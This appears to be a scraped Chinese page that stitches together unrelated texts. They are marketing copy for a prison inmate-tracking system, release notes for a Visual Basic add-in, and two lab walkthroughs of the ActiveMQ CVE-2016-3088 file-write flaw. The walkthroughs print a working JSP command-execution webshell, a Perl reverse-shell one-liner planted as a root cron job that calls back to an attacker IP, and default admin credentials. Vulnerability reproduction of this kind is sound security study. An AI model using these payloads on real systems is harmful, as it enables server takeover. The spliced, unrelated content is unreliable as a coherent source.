系统简介

“监所室内人员定位安全防范管理系统”采用物联网技术、计算机通讯技术、数据加密技术、图像处理、云计算、大数据等多种尖端高新领域技术建立多功能的人员定位系统，具有远距离读取功能和定位功能，苏州新导该系统建成后拥有统一的管理平台和数据库，为管理决策提供最翔实的基础数据，是数字化监所通过信息技术提升管理能力的重要平台。 



  意义与目标

  1、弥补管理漏洞、降低监管执法风险(如：预防非正常死亡)。

  2、解放警力、降低成本、提高工作效率。

  3、变被动监管为主动监管，达到事前预防、事中管控、事后查证管理新思路。

  4、提升监管工作智能感知，立体防控、快速处置与精准服务能力。 

  苏州新导室内人员定位方案优势

  主动预警：主动预警，民警遇袭或与突发事件时求助告警，确保民警的人身安全，解决事故发生滞后性问题，将事故隐患提前暴露，避免事故发生。

  视频联动：突发现场再现，物联网技术与现有视频结合，可以实时查看事故发生的现场情况，为调配相关警力解决突发事件提供依据。

  解放警力降低监管、执法风险：解放警力降低监管、执法风险，减轻工作压力、节约看管成本、实时点名，在押人员位置信息实时在线，行动轨迹跟踪、回放，大大降低了民警的工作强度，有效提高工作效率。

  有效杜绝越狱、自杀等恶性事件发生：在关键出入口及周界布放，在押人员靠近、非法进入主动告警，通过带有心率脉搏的电子标签，侦查在押人员生命体征，降低监管执法的风险。 

  室内人员定位系统功能展示与描述

  



                                                                                    人员统计点名

  1.自动点名 ：各区域人员实时统计

  2.快速查找：输入姓名首字母或编号，快速查找人员

  3.实时追踪：实时追踪警员、访客、重点人员等

  4.轨迹回放：历史轨迹录像回放

  



                                                                                        智能报警

  1.新来提醒：新人入监入所提醒

  2.求救报警：人员主动求救报警

  3.心率异常报警：防止非正常死亡

  4.滞留报警：单人滞留告警、滞留时间过长告警

  5.聚集报警：人员聚集报警

  6.危险报警：非法进入、非法离开报警、关错监室报警

  



                                                                                     联动对接

  1.视频联动：支持海康、大华等厂商定制开发

  2.录像合并：视频拼接、打包下载

  3.一卡通 ：门禁、消费集成

  4.门禁：门禁对接

 



 

                                                                                   设备自检

  1.防拆报警：物理结构与电子检测双重防范

  2.信号报警：信号消失报警

  3.设备异常：设备断电、断网等异常报警

  4.低电压报警：低电压报警后可持续使用一个月

 

CoderHelper没有新加功能，目前版本只是修复了更多的错误！大概30多个地方已经纠正！
不了解的朋友如果要查看截图可以打开这里： http://blog.csdn.net/MysticBoys/Gallery/150145.aspx
具体介绍点这里：
http://www.mysticboy.nease.net/coderhelper/index.htm
目前主要功能如下：
工程资源管理器-比VB本身的功能更强大！支持分组管理！
软件国际化工具-可是制作软件语言包！自动编写访问代码和语言包信息！
VB代码窗口中键支持-代码窗口不再有任何鼠标上的不自在
软件帮助体制-快速制作软件帮助，自动创建各个对象的帮助页面以及帮助工程文件，自动配置帮助ID到软件中！让你不再为配备帮助机制而烦恼！
代码注释Web页-自动生成代码注释报表！可为报表自动添加到IIS，或编译为CHM
Share Dll 编译工具 -自动强制编译 ActiveX Dll为 标准可输出函数DLL（如：shell32.dll)
内置浏览器 在IDE内即可浏览网页或其他内容
文本编辑器 可编辑开发LOG，可直接修改VBP FRM。保存后自动重新加载！
自动保存功能- 可自动在指定时间间隔中保存工程文件
自动代码备份-自动完成备份！
简单的代码注释-该功能简单实用，HelpCtID是和该方法的HelpContnentID同步的.成员描述也是同步的,它的更改也将更改该成员的描述.开发库和控件时,这时一种添加方法说明的最好方法
新式标签功能-如果你在代码中插入"'>MyCodeA<"这样引号内的内容,您将看到在标签管理器中列出当前活动代码窗口的所有标签,双击它,代码窗口立刻跳至该标记出.大大的方便了您的编程工作.
丰富了命令行功能
   命令行中可以直接调用本插件大部分功能。简单的命令即可完成很多复杂的鼠标操作或其他信息！
  点这里查看详细内容！
   http://www.mysticboy.nease.net/coderhelper/cmdline.htm
最新升级包下载地址：
www.mysticboy.nease.net/coderhelper/downdload/ch1.0.52.exe
完整安装包和升级包下载地址：
http://www.mysticboy.nease.net/coderhelper/files/CoderHelper.rar


 





 

 


 

 


 

 

 

 

一、简介

ActiveMQ的web控制台分为三个应用：admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是存储文件接口；admin和api都需要登录后才能使用，fileserver无需登录。
fileserver是一个RESful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计的目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现:

(1) 其使用率并不高
(2) 文件操作容易出现漏洞


所以在ActiveMQ5.12.x--5.13.x版本中，已经默认关闭了fileserver这个应用（可以在conf/jetty.xml中开启）;在 5.14.0版本以后彻底删除了fileserver应用。我们在测试过程中可以关注ActiveMQ的版本，避免走弯路。
本漏洞出现在fileserver应用中，漏洞的原理就是fileserver支持写入文件(但是不解析jsp)，同时支持移动文件(MOVE请求)。所以，我们只需要写入一个文件，然后使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。文件写入有几种方法：

(1)	写入webshell
(2) 写入cron或者ssh key等文件
(3)写入jar或者jetty.xml等库和配置文件





写入webshell的好处是，门槛低更方便，但前面说了fileserver不解析jsp，admin和api两个应用都需要登录才能访问，所以有点鸡肋
写入cron和ssh key的好处是直接反弹shell，也比较方便，缺点是需要root权限
写入jar，稍微麻烦点(需要jar的后门)
写入xml配置文件，这个方法比较靠谱，但是有一个鸡肋的地方就是我们需要知道activemq的绝对路径。


二、漏洞环境准备


访问http://192.168.15.148:8161正常(PS:8161是activemq的web管理页面端口)



三、漏洞复现
我们分别看一下上面说的写入webshell方法和写入cron方法

(1) 写入webshell

写入webshell，需要在admin或api应用中，这两个应用

都需要登录才能访问。activemq的默认登录为admin:admin



登录之后首先访问http://192.168.15.148:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径。



我们在这里使用BP上传一个小马文件，命名为2.txt



上传成功之后可以在http://192.168.15.148:8161/fileserver/2.txt中看到上传的小马文件。



只是现在还无法解析，不止是因为他是2.txt文件，还因为fileserver无法解析.jsp文件，我们必须把他放到api或者是admin目录下才可以解析。这里试了vulhub官网的移动文件的HTTP报头，一直都不成功。后来换了一个HTTP包一下就成功了。



把原本在/fileserver/2.txt的文件移动到/opt/activemq/webapps/api/s.jsp中。我们来试试执行命令(这里必须要登录成功了才可以执行命令)。



成功！！！

(2) 写入crontab，自动化弹shell

我们的反弹shell命令为：/usr/bin/perl -e 'use Socket;$i="IP地址";$p=端口号;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

我们通过BP上传该cron定时任务到/fileserver/1.txt文件中，将该命令设置为每分钟执行一次，所属的用户为root用户



上传成功，接下来改变文件的路径为：/etc/cron.d/root。



在kali中监听4444端口，反弹shell成功



另：这里上传ssh的公钥失败了，就不尝试了，但是学到了生成ssh公钥和密钥的命令：ssh-keygen -t rsa，该命令会生成两个文件：id_rsa(私钥文件)；id_rsa.pub(公钥文件)，将公钥文件上传到目标服务器，然后我们就可以使用ssh命令登录到目标主机中了。

四、可利用的版本
在ActiveMQ5.12.x--5.13.x版本中，已经默认关闭了fileserver这个应用（可以在conf/jetty.xml中开启）;在 5.14.0版本以后彻底删除了fileserver应用。

ActiveMQ任意文件写入漏洞（CVE-2016-3088）
前言
ActiveMQ Web控制台分为三个应用程序：admin，api和fileserver，其中admin是管理员页面，api是界面，fileserver是用于存储文件的界面；admin和api需要先登录才能使用，fileserver不需要登录。
文件服务器是RESTful API接口。我们可以通过HTTP请求（例如GET，PUT和DELETE）读写存储在其中的文件。设计目的是为了弥补消息队列操作无法传输和存储二进制文件，但后来发现的缺陷：使用率不高；文件操作容易产生漏洞。
靶机：192.168.168.128
影响范围
ActiveMQ：5.x〜5.13.x
复现过程
Webshell篇


访问管理页面，长这样↓，说明环境部署成功。




上传java后门到fileserver下，服务器返回204才算成功，后跟代码。

java

<%@ page import=“java.io.*”%>

<%

out.print(“Hello”);

String strcmd=request.getParameter(“passwd”);

String line=null;

Process p=Runtime.getRuntime().exec(strcmd);

BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

while((line=br.readLine())!=null){

out.print(line+"");

}

%>


访问http://192.168.168.128:8161/fileserver/a.jsp，发现后门文件没有被解析，说明该目录没有执行权限，需要将后门文件移动到具有执行权限的目录下。


访问http://192.168.168.128:8161/admin/test/systemProperties.jsp查看ActiveMQ绝对路径。




将fileserver下的后门文件a.jsp移动到具有执行权限的 /opt/activemq/webapps/api/s.jsp目录下。


访问Webshell。